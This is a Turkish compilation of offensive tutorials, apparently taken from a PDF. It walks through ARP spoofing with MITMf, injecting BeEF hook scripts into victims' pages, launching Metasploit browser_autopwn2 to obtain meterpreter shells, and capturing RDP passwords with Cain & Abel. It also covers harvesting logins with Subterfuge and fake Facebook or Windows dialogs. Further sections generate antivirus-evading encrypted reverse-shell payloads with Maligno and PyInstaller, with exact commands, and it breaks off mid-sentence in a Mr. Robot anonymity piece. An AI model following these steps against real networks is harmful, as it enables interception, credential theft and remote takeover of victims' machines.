MITMf + BeEF + Metasploit = Exploit Combo

Transkript

1 MITMf + BeEF + Metasploit = Exploit Combo ARP Poisoning/Spoofing ile bir network içerisinde çeşitli saldırılar yapılabilir. Örnek olarak aynı ağda bulunduğumuz kurban veya kurbanların trafiğini üstümüze alabiliriz. Yerel ağ içerisinde makineler birbirleriyle haberleşirken MAC adreslerini kullanırlar. Bu olay OSI modelindeki 2. katman olan Data Link Layer da gerçekleşmektedir. Ağda bulunan makineler broadcast ile yaydıkları paket sonrası aynı ağda bulunan diğer makinelerin IP-MAC eşleştirmesini yapar. IP-MAC eşleştirmesinin bulunduğu yer ARP (Address Resolution Protocol) tablosudur. Yerel ağda haberleşmek istenilen iki makine arasında kurulacak bağlantı öncesinde ARP tablosundan bakılarak iletişimin kurulacağı IP ye denk düşen MAC adresi bulunur ve işlemler bu MAC adresi üstünden gerçekleşir. ARP Poisoning saldırısında, seri şekilde gönderilen ARP paketleri ile kurban ve router arasına girilir. Yazıda ARP spoofing ile gerçekleştirilebilecek saldırılardan olan MITM (Man In The Middle Ortadaki Adam) anlatılacaktır.mitm saldırısının gerçekleştirilmesi sırasında saldırgan ve kurban arasında gerçekleşen trafiği aşağıdaki gibi açıklayabiliriz. Trafiği yönlendiren cihaza(router/switch), kurbanın MAC adresi diye saldırganın MAC adresi gönderilerek, saldırgan kendini, kurban olarak taklit eder ve cihazın ARP tablosunda IP-MAC eşleştirmesi bu şekilde görünür. Kurban a, router MAC adresi diye saldırgan MAC adresi gönderilerek kurbanın ARP tablosundaki router MAC adresi saldırganın MAC adresiyle değiştirilir. Poisoning için gönderilen paketler sahte ARP paketleridir. Bir resim ile olayı özetlemek gerekirse;

2 ARP spoofing ile gerçekleştirilen bu saldırıda (MITM), saldırgan olan kişi kurban veya kurbanların tüm trafiğini üstüne alabilir. Şifrelenmemiş bir şekilde giden trafikteki tüm özel bilgileri okuyabilir. ARP Spooging ile ilgili ayrıntılı bilgi için: adresi ziyaret edilebilir. MITMf MITMf (Man-In-The-Middle Attack Framework), MITM saldırıları için byt3bl33d3r tarafından geliştirilen bir MITM saldırı aracıdır. İçerisinde bir çok saldırı modülü bulunmaktadır. Bu yazıda MITMf in inject modülünü kullanacağız. Inject modülü, HTML içeriğe müdahale etmemizi ve buna ek olarak kullanacağımız modül ile işlem yapmamızı sağlar. Ek modüllerden bazıları şunlardır: js-url, html-url ve htmlpayload. Js-url: İçeriğe zararlı Javascript kodu barındıran link gömmemizi sağlar.

3 Html-url: İçeriğe gizli bir iframe aracılığıyla html link gömmemizi sağlar. Html-payload: İçeriğe HTML kodlarını dahil etmemizi sağlar. BeEF BeEF (The Browser Exploitation Framework), XSS zafiyetlerini kullanarak ileri seviye saldırı işlemlerinin yapılabilmesine imkan tanıyan bir araçtır. Ürettiği Javascript kod içeren zararlı url e kurbanın yönlendirilmesi sonucu browser üstünde birçok saldırı gerçekleştirilebilmektedir. Kali linux ta kurulu bir şekilde gelmektedir. Depodan kolay bir şekilde kurulabilmektedir. Amaç Yazı kapsamında BeEF in üreteceği hook js adresini, MITMf ile üstümüze aldığımız kurban trafiğinde geçen sayfalara enjekte eden modülü kullanarak enjekte edeceğiz. Sonrasında BeEF ve Metasploit kullanarak kurban bilgisayarında shell açacağız. Metasploit + BeEF BeEF in konfigürasyon dosyalarında yapılacak bazı değişiklikler ile Metasploit i BeEF e entegre edebiliriz. Bu sayede Metasploit kullanabiliriz. üzerinde bulunan birçok exploit i Yazı kapsamında sadece entegrasyon işlemi gösterilecektir, shell açma işlemi entegrasyondan bağımsız bir şekilde gerçekleştirilecektir. Entegrasyonu işlemini gerçekleştirebilmek için BeEF konfigürasyon dosyasında kullanılacak extension lar kısmında Metasploiti aktifleştirmek gereklidir. BeEF klasöründe bulunan config.yaml dosyasının son satırlarında bulunan metasploit aktifleştirme için kullanılan değişkenin false değerine sahip alanı true olarak değiştirmemiz gerekmektedir. Dosyanın yolu;

4 /usr/share/beef-xss/config.yaml BeEF üstünde Metasploit eklentisinin çalışmasını sağladık. Metasploit tarafındaki bağlantıyı/işlemleri sağlayacak RPC modülünün konfigürasyonunun yapılması gerekmektedir. Bunun için BeEF tarafında Metasploite bağlantı sırasında kullanılacak kullanıcı adı, parola gibi seçeneklerin düzenlenmesi gerekmektedir. BeEF içerisinde çalışacak eklentilerin bulunduğu extensions klasörünün altında bulunan metasploit klasöründe bulunan config.yaml dosyasını düzenlememiz gerekmeketedir. Dosyanın yolu; /usr/share/beef-xss/extensions/metasploit/config.yaml

5 Burada bulunan değerleri, Metasploit içerisinde bulunan msgrpc modülüne bağlantı sırasında kullanacağımız için gerekli düzenlemeleri yapmamız gerekmektedir. Veya burada bulunan bağlantı değerlerini dikkate alarak Metasploit tarafında msgrpc modülünü uygun şekilde yüklememiz gerekmektedir. Metasploit tarafında bağlantıyı karşılayacak msgrpc modülünü yukarıdaki değerler ile yüklemek için; load msgrpc Pass=abc123 Metasploit, msgrpc modülü default olarak load edildiğinde IP ve numaralı port üstünde bağlantıyı başlatmaktadır. Default kullanıcı adı msf, kullanıcı parolası ise random bir şekilde üretilmektedir. Her load sırasında bağlantı için 8 haneli karmaşık bir parola rastgele bir şekilde atanmaktadır. Bu yüzden BeEF in bağlantı sırasında kullanacağı parola olan abc123 veya kendi belirlediğimiz parolayı kullanarak msgrpc modülünü yüklemek için Pass parametresine gerekli değeri vererek yüklemeyi gerçekleştirmesini sağlayabiliriz. BeEF in çalıştırılması Linux deposunu kullanarak BeEF i kurmuşsak eğer direkt olarak komut satırından beef-xss diyerek, veyahut uygulamanın

6 bulunduğu klasöre giderek beef isimli ruby scriptini çalıştırmamız gerekmektedir. Resimden anlaşılacağı üzere entegrasyonu sağladığımız için Metasploit modülleride yüklenmiştir. Bilgisayarda bulunan tüm network inteface ler için ayrı ayrı port üzerinden BeEF kontrol panelini ve zararlı Js kodunu içeren url çalıştırmaktadır. Kontrol paneline erişmek için ui/panel ile biten herhangi bir url kullanılabilir. veya Üretilen zararlı js kodunu içeren url ise hook.js ile biten adreslerdir. Yerel ağda kullanmak için, bize ulaşılabilecek bir url i kullanmamız gerekmektedir. gibi. BeEF kontrol paneline ( erişmek istediğimiz zaman gelen giriş ekranında, değiştirmediyseniz eğer, kullanıcı ve parola beef dir.

7 Giriş ekranından sonra aşağıdaki bir ekran bizi karşılamaktadır. Hooked Browsers alanında js içeren sayfaya gelmiş ve iletişimde olduğumuz IP leri içerir.burada bulunan Online ve Offline Browsers kısımları ise, aktif olan veya bağlantımızın koptuğu kurbanları gösterir. Getting Started sekmesi BeEF hakkında genel bilgiler veren bir ekrandır. Logs sekmesinde ise yapılan işlemlerin ID leriyle beraber hangi tipte işlemler olduğu, ne zaman ve hangi kurban browserı üstünde gerçekleştiği gibi bilgileri gösterir. Zararlı Js bulaştırılan kurbanlar olduktan ve bunları sol taraftaki menüden seçtikten sonra Current Browser sekmesi gelmektedir. Tüm işlemler gerçekleştirilecektir. bu sekme altında

8 Bahsi geçen sekmeden bir görüntü aşağıdadır. Genel olarak, kurban ve browser hakkında bilgiler içeren Details sekmesi, seçilen browser üstünde yapılan işlemleri loglayan Logs sekmesi ve en önemlisi olan Commands sekmesi gibi alanları içermektedir. Commands sekmesi üzerinde kurbana karşı yapılacak saldırıların listesi kategorilere ayrılmış halde bulunmaktadır.

9 Saldırı Geriye kalan aşamaları özetlemek gerekirse; MITMf aracı ile ARP spoofing yapıp, inject modülünü kullanarak zararlı js kodu içeren linki trafiğe gömmek, Metasploit tarafında browser exploit modülü kullanmak. Biz bunun için browser ile alakalı exploitleri hızlı bir şekilde deneyen, otomatize edilmiş browser_autopwn2 modülünü kullanacağız. BeEF aracılığıyla, iframe veya redirection modülleriyle

10 exploitlerin bulunduğu url e kurbanı yönlendirmek. Önce MITMf ile ARP spoofing saldırısını gerçekleştirip kurbanın tüm trafiğini üstümüze alalım. Bunu MITMf ile gerçekleştirmek için aşağıdaki komut girilebilir. mitmf interface wlan0 target gateway arp spoof inject js-url Girilen parametreleri açıklamak gerekirse, interface parametresi, saldırının gerçekleştirileceği network arayüzünü belirtmek için kullanılır. target parametresi, kurban veya kurbanların IP adreslerini belirtmek için kullanılır. Subnet şeklinde de kullanılabilir bir formatı vardır. gateway parametresi, trafiğimizi yönlendiren cihazın (router/switch vb) IP adresini belirtmek için kullanılır. ARP spoofing sırasında target parametresiyle kullanılacak olan değerlerdir. spoof parametresi, Spoofing modülünü kullanacağımız belirtmek için kullanılır. arp parametresi, spoofing için kullanılacak yöntemi belirtir. Diğer alt modüller: ICMP, DHCP, DNS. inject parametresi, HTML içeriklerine müdahale eden modülü çalıştırmayı sağlar. js-url parametresi, HTML içeriğe eklenecek olan ve BeEF tarafından üretilmiş, bizim kurbanın browser ına müdahale etmemizi sağlayan, Javascript kodu içeren linktir.

11 Metasploit Browser Exploitation Saldırıyı başlatıp, kurbanın trafiğini üstümüze aldıktan sonra, sıra Metasploit tarafında browser exploit modüllerini başlatmakta. Bunun için yukarıdaki satırlarda belirttiğimiz gibi browser_autopwn2 modülünü kullanacağız. Bu modül, bir önceki versiyonu olan browser_autopwn modülünün optimize edilmiş hali gibi düşünülebilir. Hızlı bir şekilde exploitleri deneyebilir. Bu modülü Metasploit üstünde kullanabilmek için, use auxiliary/server/browser_autopwn2 kullanılacak olan modülün hangi parametreleri kullandığına bakmak için, show options Resimde görüldüğü üzere değerinin girilmesi şart olan iki parametre vardır ve hali hazırda bunlar kullanılmıştır. Bir önceki versiyonundan farklı olarak INCLUDE_PATTERN ve EXCLUDE_PATTERN parametreleri eklenmiştir. Bu parametreler, yüklenecek ve denenecek exploitlerin dahil edilmesi veya hariç bırakılması manasına gelmektedir. Örneğin sadece java, flash, opera veya firefox exploitlerini dene veyahut tam tersi bunları veya bunlardan birilerini hiç deneme gibi.

12 Girilmesi zorunlu olmayan fakat oluşturulacak exploitlerin bulunduğu url i etkileyen URIPATH parametresine /pwned gibi bir uzantı veriyorum. Bu sayede oluşturulacak url /RandomKarakter formatında olmayacak ve girilen şekilde olacaktır. Bunların dışında pek bir değişikliğe gerek yoktur. Exploit veya run diyerek modülün exploitleri düzenleyip, server ı başlatıp, oluşturulan url i vermesini sağlayabiliriz. Modüller derecelerine ve yayınlanma tarihlerine göre belli bir sıraya sokulduktan sonra payloadlarıyla beraber yüklenerek zararlı URL oluşturulur. Görüldüğü üzere oluşturulan url, URIPATH parametresiyle verdiğimiz formatta oluşturulmuştur.

13 BeEF Kurbanın ziyaret ettiği sayfalara MITMf tarafından zararlı js linki enjekte edilmektedir. Kurbanın veya veyahut herhangi bir sayfayı ziyaret ettiği varsayılırsa, MITMf ile girdiğimiz komutun sonunda ekranda oluşacak görüntü aşağıdaki gibidir; Resimden de anlaşılacağı üzere zararlı, HTML sayfada enjekte edilmiştir. Peki MITMf tarafında bu olurken BeEF tarafında ne olmaktadır? BeEF i başlattığımız terminal ekranına baktığımızda ise zararlı js in işini başarıyla yaptığı görülecektir. Enjekte edilen browser, BeEF tarafında Hooked olarak geçmektedir.

14 Shell BeEF kontrol panelinde gördüğümüz üzere Hooked Browsers alanında bulunan Online Browsers kısmına kurbanın bağlantısı gelmiştir. Üzerine tıkladığımız vakit sağ taraftaki sekmelerin yanına işlemleri gerçekleştireceğimiz Current Browser sekmesi gelecektir. Modüller arasında yapılabilecek çok sayıda saldırı vardır. Kurban bilgisayarı hakkında bilgi almaktan, bulunulan network için port taraması yaptırmak, hangi uygulamaları kullandığını öğrenmek, webcam üzerinden görüntü almak, sosyal mühendislik saldırıları gerçekleştirmek gibi saldırıları gerçekleştirmek için gereken yüzlerce modül vardır. Shell invisible iframe Amacımız kurbanı, Metasploit tarafında oluşturduğumuz exploitleri içeren sayfaya yönlendirmek. Bu iş için kullanabileceğimiz modüllerden biri olan ve Misc modül ağacının altında bulunan Create Invisible Iframe modülünü kullanacağız. Ardından aynı işi farklı bir modül olan Redirect Browser (iframe) ile nasıl gerçekleştirileceğini göreceğiz. Invisible iframe modülünü açtıktan sonra resimde görüldüğü üzere tek bir parametre vardır ve bu oluşturulacak iframe içinde yönlendirilecek URL adresidir. Bu adrese Metasploit

15 tarafında oluşturduğumuz linkini yerleştirip Sağ alt köşede bulunan Execute komutuyla çalışmasını bekliyoruz. Kısa bir sürenin ardından Metasploit tarafındaki bağlantıya istek gelecek, ardından exploitler test edilmeye başlanacaktır. Başarılı olması halinde oluşturulan exploite uygun olarak ayarlanmış payload için session oluşacaktır. Elde ettiğimiz shell görüldüğü üzere meterpreter shell dir. Shell Redirect Browser (iframe) Bu modül, Browser modül ağacının altında bulunan Hooked Domain

16 modüllerinin içerisinde yer almaktadır. Kullanılacak modül, kurbanın browser ında bulunan sayfadaki url üzerinde herhangi bir değişiklik yapmadan, sayfanın Title ve icon özelliklerini istediğimiz şekilde değiştirip yönlendirme yapmaktadır. Benzer şekilde iframe kullanmadan yönlendirme yapan Redirect Browser modülü de kullanılabilir. Burada bulunan bazı parametreleri açıklamak gerekirse; New Title: Yönlendirme sonunda oluşacak sayfanın başlığı. New Favicon: Yönlendirme sonunad oluşacak sayfanın ikonu. Redirect URL: Yönlendirilecek adres. Burada verilecek adres Metasploit tarafında oluşturduğumuz exploitlerin olduğu URL dir. Yönlendirme sonunda browser da şöyle bir görüntü oluşacaktır. Modülü çalıştırmadan evvel girdiğimiz değerler, browser da Hooklanmış sayfaya girdiğimiz şekilde yansımıştır. Kısa bir sürenin ardından Metasploit tarafındaki bağlantıya istek gelecek, ardından exploitler test edilmeye başlanacaktır. Başarılı olması halinde oluşturulan exploite uygun olarak ayarlanmış payload için session oluşacaktır. Elde ettiğimiz shell görüldüğü üzere meterpreter shell dir.

17 Daha önce söylediğimiz üzere BeEF üzerinde çok sayıda modül vardır. Bu modüller ile örnekte yaptığımız gibi yönlendirme yapıp shell açabileceğimiz gibi, Fake update bildirimleri de çıkararak oluşturacağımız arka kapıyı kurbanların indirmelerini sağlayıp shell açabiliriz. İstediğimiz herhangi bir Javascript kodunu çalıştırabiliriz. Hooklanmış sayfada fake bir login ekranı gösterip kullanıcının giriş bilgilerini elde edilebiliriz. Örnek olarak Social Engineering modül ağacı altında bulunan Pretty Theft modülü kullanılarak Facebook, LinkedIn, Windows, Youtube gibi yerler için bilgiler alınabilir. Aşağıda Facebook ve Windows seçenekleri için modülün uygulanması sonucu sayfada gösterilen dialogların görüntüleri verilmiştir. Windows:

18 Facebook: Python ile Simple HTTP Server Kullanımı Bu yazımızda Python un yerleşik Web sunucusunun kullanımını göreceğiz.simplehttpserver modülü, Python da standart olan GET ve HEAD handlerlarını sağlayan basit bir HTTP sunucudur. Python Yerleşik Web sunucunun avantajı, herhangi birşey yüklemenize ve konfigüre etmenize ihtiyaç olmamasıdır. İhtiyacınız olan tek şey Python un yüklü olmasıdır.önemli olan tek şey, bu modülü tarayıcıdan erişmek istediğiniz dizinde

19 çalıştırmanızın gerektiğidir. Örnek: 80 portunda bir HTTP Sunucu çalıştırmak istiyoruz (varsayılan olarak port 8000 dir) #python -m SimpleHTTPServer 80 Enter a bastığınızda şu şekilde bir uyarı mesajı göreceksiniz. Serving HTTP on port 80 Artık dizindeki klasör ve dosyalara tarayıcınıza yazarak erişebilirsiniz.http terminalde Python güncellenecektir. Web sunucu çalıştığı müddetçe sunucunuza yüklenen veriler Cain & Abel Aracıyla Windows RDP Şifrelerini Elde Etme Cain&Abel yani türkçesiyle Kabil ile Habil isimli bu program çok eski bir program aslında. Programın resmi sitesinde Microsoft İşletim Sistemlerinin şifre kurtarma amacıyla geliştirildiği yazıyor. Lakin program şifre kurtarma dışında ağ üzerinde her türlü saldırı işlemlerini yapabilecek şekilde geliştirilmiş. Öyle ki yüklerken meşhur packet capture programı winpcap olmadan yüklenmiyor. Yönetici yetkileri olmadan da çalıştırılamıyor. Programın son versiyonu Windows XP zamanından kalma olsa da şimdi bile çok etkili şekilde şifre kırma işlemleri,ağ dinleme vb. birçok işlemi gerçekleştirmek üzere tasarlanmış.adeta yerel ağda kullanılmak üzere geliştirilmiş kötücül bir İsviçre çakısı.

20 Cain&Abel ile RDP şifrelerinin elde edilmesi adımları: Menüden Configure kısmından Sniffer tabında sniffer ayarları görülmektedir. APR sekmesinde ise ARP zehirleme ile ilgili konfigürasyonlar görülmektedir. İlk önce Cain&Abel programıyla start sniffer butonuna tıklamamız gerekiyor. Sarı radyasyon uyarı botununa benzeyen butonun solundaki buton start sniffer butonudur. Daha sonra Sniffer kısmından sağ tuş yapıp SCAN MAC ADDRESSES İ seçerek aşağıdaki çıkan ekrandaki gibi subnet imizde yer alan bilgisayarları taramamız gerekmektedir.

21 Tarama sonucunda bulunan listelenmektedir: MAC adresleri aşağıdaki gibi ARP zehirleme işlemine başlamak için APR kısmına geçilir, Sarı radyasyon uyarı butonuna benzeyen buton tıklanır.daha sonra mavi artı işareti tıklanarak zehirlenecek hedefler belirlenir.aşağıdaki resimde zehirlenecek bilgisayarlar olarak ile arasındaki trafik seçilmiştir. Zehirleme işlemi çift yönlü olarak gerçekleştirilmektedir. Zehirleme işlemi başlatılmış ve iki bilgisayar arasında RDP(uzak masaüstü) bağlantısı trafiği oluşması beklenmektedir.

22 Windows 7 yüklü bilgisayardan Windows Server 2012 yüklü bilgisayara uzak masaüstü bağlantısı gerçekleştirilmiştir. Windows 7 bilgisayarından uzak masaüstü bağlantısı için kullanıcı adı ve şifre girme işlemi gerçekleştirilmiştir. Uzak masaüstü bağlantısı gerçekleştirilmiştir. başarılı bir şekilde

23 Aşağıdaki ekran görüntüsünde Cain&Abel programının zehirlediği bilgisayarlar üzerindeki RDP bağlantısındaki şifreyi kırma anı görülmektedir. Şifre başarılı bir şekilde kırılmıştır ve RDPv4 yazan yerde sağ tuş yapılarak kırılan parola görülebilmektedir. Aşağıda cmd.exe üzerinden kırılan parolanın komut satırından görüntülenmesi işlemi gerçekleştirilmiştir.

24 Subterfuge ile Middle Attack Man in the middle saldırıları, Man in saldırganın The hedefindeki bilgisayarla diğer bilgisayar veya bilgisayarların ağdaki tüm veri trafiğini kendi üzerine alması yoluyla yaptığı saldırı tipidir.bu tür bir saldırıyı yapmak için temel düzeyde Layer 2 (Physical Layer) ve Layer 3 bilgisi yeterlidir. Layer 2, Data Link Katmanı olarak adlandırılır. Fiziksel adresleme bu katmanda yapılır. Layer 3, Network Katmanı, işte bu katman ip lerden oluşur, ip blokları ile tanımlanmış ağlar arasındaki veri iletişimi bu katmanda sağlanır. Layer 2 de çalışan switch mantığı; Switch herhangi bir porttan gelen bir ağ paketini alır. Aldığı paketin mac adresi anahtarın mac adres tablosu nda yoksa bunu mac adres tablosuna ekler. Aldığı paketin hedef mac adresini kendi mac adres tablosunda arar, eğer kendi mac adres tablosunda var ise bu paketi ilgili porttan gönderir. Eğer yoksa hiç bir şey yapmaz. (Drop edilir.)

25 Not: Mac adres tablosu, mac adreslerini anahtarın portları ile ilişkilendirildiği tablodur. Bu tablo ile hangi mac adresine anahtarın hangi fiziksel hangi portundan ulaşılabildiğine bakılabilir. Bazen arp tablosu ile karıştırılabilir, arp tablosu mac adreslerinin ipler ile ilişkilendirildiği tablodur. Mac Adres Tablosu 00:00:00:00:AA:AA FastEthernet 0/0 00:00:00:00:BB:BB FastEthernet 0/0 00:00:00:00:CC:CC FastEthernet 0/1 Arp Tablosu 00:00:00:00:AA:AA :00:00:00:BB:BB :00:00:00:CC:CC Peki örneğin ip li bilgisayar, ip li bir bilgisayar ile iletişimi geçmek isterse ne yapar? Layer 2 de bilgisayarlar birbirleri ile iletişime geçmek için mac adreslerini kullanırlar, IP ler ise Layer 3 te işimize yarar. Yani aynı ağdaki 2 bilgisayar iletişime geçmek için birbirlerinin mac adreslerini bilmek zorundadırlar. Sorunun cevabına gelince; ipli bilgisayar kendi arp tablosuna bakar, ipli bilgisayar arp tablosunda varsa arp time out süresi içinde zaten bu bilgisayar ile bir iletişime geçilmiş demektir. Eğer yok ise bu bilgisayar ile henüz bir görüşme sağlanmamış demektir yani bağlantı için ilk adıma geçilir. Bu da arp request broadcast paketini göndermekle başlar. Arp request paketi ağdaki tüm bilgisayarlara iletilir ve sorar kim? , bu arp sorusuna benim diye cevap verir ve bu cevabın içinde de kendi mac adresi vardır den gelen cevabı alan ipli bilgisayar

26 artık ipli bilgisayarın mac adresini biliyor, yani onunla iletişime geçmek için yeterli bilgisi var. Göndermek istediği paketin kaynak mac adresine kendi mac adresini, hedef mac adresinin yerine ise ipli bilgisayarın mac adresini ekleyerek paketi gönderir. Tam bu noktada eğer biz ü yanıltır ve nin mac adresi o değil bu diyerek kendi mac adresimizi yazarsak ne olur? Paket bize gönderilir. Peki, aynı paketi alıp ye biz göndersek ve yanıt bize gelse bizde aldığımız cevabı tekrar e gönderirsek ne olur? ün e gönderdiği tüm verileri kendi üzerimize almış oluruz ve eğer bu ağda internete çıkmak için kullanılan modem, router, proxy veya benzeri bir cihaz ise ün bütün internet faaliyetleri bizim kontrolümüz dahilinde gerçekleşir. Subterfuge ile MITM ın nasıl yapıldığını görelim > SETUP (Kurulum) Kali makinasında Subterfuge un en son sürümünü indiriyoruz; $ wget eb Komutu yazarak yükleme işlemi yapıyoruz; $ dpkg -i subterfuge_1.0-1_all.deb Subterfuge a bağlı olan şeyler var ise onları da update ediyoruz. $ apt-get update && apt-get -f install Subterfuge u çalıştırıyoruz. $ subterfuge

27 Sonra tarayıcımızdan e giderek Subterfuge arayüzüne ulaşıyoruz. Arayüzde Settings kısmına tıklıyoruz ve ekrandaki ayarlamaları yapıyoruz. Sonrasında MITM Vectors istediğimiz adresini yazıyoruz. sekmesine tıklayarak zehirlemek IP

28 Sonra Modules sekmesine tıklayarak Network View e tıklıyoruz ve Apply tuşuna basıyoruz. IP adresi olan kurban (victim) Linux makinayı görüyoruz. Burada Scan tuşu ile açık olan portları görebiliriz. Kontrol etmek istediğimiz saldırı türünüde istersek Controls kısmındaki simgelerden(http Injection,DoS Attack vs.) gerçekleştirebiliriz.kurban bilgisayardaki kişi eğer login olarak herhangi bir yere giriş yapıyor ise o bilgiler bizim elimize ulaşmış oluyor.

29 Siteye yaptığı girişin session bilgileri de elimize ulaşıyor. Mesela kurban bir siteye giriş yapsın. Ve bu bilgiler, log in tuşuna bastıktan sonra bizim Subterfuge ekranımıza düşmüş oluyor. Bu şekilde router ve kurban bilgisayar arasında MITM saldısını gerçekletirmiş oluyoruz. Anti-Virus Atlatma Maligno Kullanımı Anti-virüs bypass yazı dizisinin başka bir bölümü olan Maligno aracını anlatan yazı ile devam edeceğiz. Maligno, Encripto tarafından, python diliyle yazılmış ve opensource olarak geliştirilen, Metasploit framework ün payload/shellcode üretme aracı olan msfvenom u kullanarak, meterpreter reverse http, https ve https proxy ile beraber pyton meterpreter reverse tcp bağlantılarını sağlayacak olan shellcode ları üreterek AES ile şifreleyip ayrıca ürettiği python çıktısını obfuscate edip kullanıma hazır hale getirmektedir.

30 Kurulum Yazı süresince yapılan işlemlerde Kali linux işletim sistemi kullanılmıştır. Maligno nun son sürümü dowload sayfasından indirilebilir. wget tar zxvf maligno-2.4.tar.gz # sıkıştırılmış dosya açılıyor cd maligno-2.4/ && bash install.sh Çalıştırılan bash script sistem güncellemesini yaptıktan sonra, gerekli paketleri yükleyecektir. Bundan sonra şifreleme için kullanılacak olan anahtar üretilmeye başlanacaktır. İlk olarak özel anahtarımız 2048 bitlik RSA ile üretilecek, ardından server için üretilecek olan ssl sertifikası için gerekli kısa bir kaç soruya yanıt vermemiz beklenmektedir. Bunların sonunda işlemler bitmiş olacak ve konfigürasyon dosyasını güncellememiz gerekecektir. Konfigürasyon Üretilecek olan zararlı yazılımlara ait bilgileri içeren server_config.xml dosyasını reverse bağlantı için kullanılacak olan sunucuya göre ayarlamamız gerekmektedir. Burada düzenlenmesi gereken bilgilerden bazıları; Metasploit payload ismi Payloadlar için gerekli host adresi ve port numarası Hangi encode işleminden geçirileceği Encode işleminin kaç iterasyon işleminden geçeçeği Kullanılmasının istenmediği karakterler (badchars)

31 Network scope alanı Bu alanlardan düzenlenmesi zaruri olan kısımlar, bilgisayarda kurulu olan Metasploit framework yolu ve LHOST alanlarıdır. İstenildiği takdirde, üretilen shellcode un geçirileceği encode tipi ve iterasyon sayısı veya reverse bağlantıda kurbanın bize geleceği port adresi gibi alanlar da değiştirilebilir. Maligno Server Maligno klasörü içerisinde bulunan ve kullanılabilecek dosyalardan biri olan maligno_srv.py, oluşturulacak olan zararlıların bulaştığı kurbanlar hakkında bilgilendirme sunan ve bu payloadlar için Metasploit tarafında kullanılabilecek Resource dosyalarını oluşturmaktadır. Aynı zamanda uygulamanın güncellemelerini de kontrol etmektedir. Maligno Client Generator Maligno klasörü içerisinde bulunan ve kullanılabilecek dosyalardan bir diğeri olan clientgen.py scripti, Metasploit in meterpreter reverse http, https, https_proxy ve python meterpreter reverse tcp bağlantılarını elde edebilecek payloadları oluşturur. Çıktılar (clients klasöründe) python dosya formatındadır. Bunların yanında oluşturulan zararlı

32 yazılımlar için Metasploit tarafında kullanılacak handler için payloadların resource dosyaları da oluşturulmaktadır (msfresource klasöründe). Oluşturulan zararlılar python dosya formatında verilmektedir. Enfekte işleminin yapılacağı makinede python interpreter yüklü ise normal bir python dosyasıymış gibi çalıştırabiliriz. Fakat bilgisayarda python yüklü olmayacağı gibi kullanılan python modülleri de yüklü olmayabilir ve bu yüzden dosya çalışma sırasında sıkıntılar yaratabilir. Bu yüzden python dosyamızı bazı yardımcı modüller (PyInstaller, Py2Exe, cx_freeze) ile çalıştırılabilir dosya formatı olan exe ye çevirebiliriz. Yazıda dönüştürme işlemi için PyInstaller kullanılacaktır. Bağlantıyı kurması için kullanılacak olan zararlıları oluşturmak için clientgen.py dosyasını kullanacağız. Bunun için; python clientgen.py -f server_config.xml -s true Burada -f parametresi için kullanılan argüman, içeriğini düzelttiğimiz konfigürasyon dosyası, -s parametresi ise hem resource dosyalarını oluşturur hemde scriptlerin çalıştırılabilmesini sağlar. Sorunsuz bir şekilde python scriptleri ve Metasploit resource dosyaları oluşturulmuştur.

33 Python Dosya ile Reverse Bağlantı Oluşturulan zararlıları kurban bilgisayarda çalıştırmadan evvel gelecek olan bağlantıyı yakalayacak handlerı oluşturmamız gerekmektedir. Yukarıdaki satırlarda belirttiğimiz gibi Maligno, handler için resource dosyalarını da oluşturmaktadır. Oluşturulan zararlılardan meterpreter için reverse HTTPS bağlantı veren dosyayı çalıştıracağımız farz edelim ve buna göre oluşturulan resource dosyasını yükleyelim.

34 Python un ve diğer modüllerinin yüklü olduğunu varsayıp, kurban bilgisayarında oluşturduğumuz scripti çalıştıralım. Dosya çalıştırıldıktan sonra dinlemeye aldığımız Metasploit tarafına bağlantı gelecektir ve session oluşacaktır.

35 EXE ile Reverse Bağlantı Önceden belirttiğimiz gibi her bilgisayarda python olmayabilir. Olsa dahi gerekli modüller yüklü olmayabilir. Bu yüzden python dosyasımız bazı modülleri kullanarak çalıştırılabilir dosyalara dönüştürebileceğimizden bahsetmiştik. PyInstaller ile python dosyamızı exe formatına dönüştürmek için aşağıdaki komut kullanılabilir. pyinstaller.exe onefile windowed standalone_1_standard_windows_reverse_https.py

36 İşlemin sonunda komutu çalıştırdığımız klasörün içerisinde build ve dist klasörleri oluşacaktır. Dist klasörü altında aradığımız exe dosyası bulunmaktadır. Bu dosyaya çift tıkladığımızda veya komut satırından çalıştırdığımızda, herhangi bir exe dosyasıymış gibi, beklemeye aldığımız Metasploit tarafına bağlantı düşecektir. Tarama Sonucu Oluşturduğumuz zararlı yazılımın, online tarama sonucu aşağıda

37 ki resimlerde verilmiştir. İlk olarak python dosyamız için VirusTotal sayfasında yaptığımız taramanın sonucunu görelim. Şimdi ise PyInstaller ile exe ye çevirdiğimiz zararlı dosya için VirusTotal web sitesinde yapılan taramanın sonucunu görelim. MR.Robot Nasıl Anonim Kalıyor? Eğer bu yazıyı okuyorsanız muhtemelen M.r. Robot dizisini izlemiş ve bilgi güvenliğine merak duyuyorsunuz demektir. M.r. Robot dizisini ilk bölümünden itibaren izleyenleriniz gerçeğe yakın bir senaryo ile karşılaştınız. Başrolde oynayan Rami Malek yani dizideki adıyla Elliot gündüzleri bir siber güvenlik firmasında çalışan beyaz şapkalı bir güvenlik çalışanıyken akşamlarıysa siyah şapkalı bir hacker gibi davranan bir karakter. Dizide Kali işletim sistemini kullanan Elliott her bölümde farklı araçlar kullanarak gerçeğe yakın bir rol üstleniyor.örneğin bu araçlar Social Engineering

38 Toolkit,Bluesniff olabiliyor. Dizide Elliot saldırılarını gerçekleştirirken takip edilemez ve adresi bulunamaz şekilde kendini gizleyebilmektedir. Öyle ki Elliot ın psikoloğunun eski sevgilisi Lenny Elliot ın kendisini hacklediğini ve Estonya üzerinden bir proxy kullanarak gizli kaldığını söylemektedir. Proxy ler Nasıl Çalışır: Bir siteyi ziyaret ettiğinizde size ait tekil bir IP adresi de sizinle birlikte aktarılır. Eğer hiçbir gizlilik olmadan kendi ip adresinizle bir siteyi hack etmeye çalıştığınızda karşı taraf saldırının geldiği kaynak ip adresini kontrol ederse sizi kolayca tespit eder. Bunu önlemek için hackerlar proxy leri kullanırlar. Proxy ip adresini kullanarak orjinal ip adresini gizlerler. Proxy sizinle web sunucu haberleşmesi esnasında arada kullanılarak vekil görevi kurar.bu işi yapan sunuculara da vekil sunucu denir. Anonim proxylere örnek olarak Tor verilebilir. Tor Google ve diğer takip sistemlerine karşı sizi gizlemekte etkilidir. Yalnız NSA gibi kurumlara karşı ise etkisiz kalmaktadır. Elliot ın ilk bölümde söylediği şu sözden anlaşılacağı üzere Çıkışı kontrol eden herşeyi kontrol eder. Bu da benim herşeyi kontrol etmemi sağlıyor. M.r. Robot nasıl anonim kalıyor uygulamalı olarak görelim: Öncelikle Kali 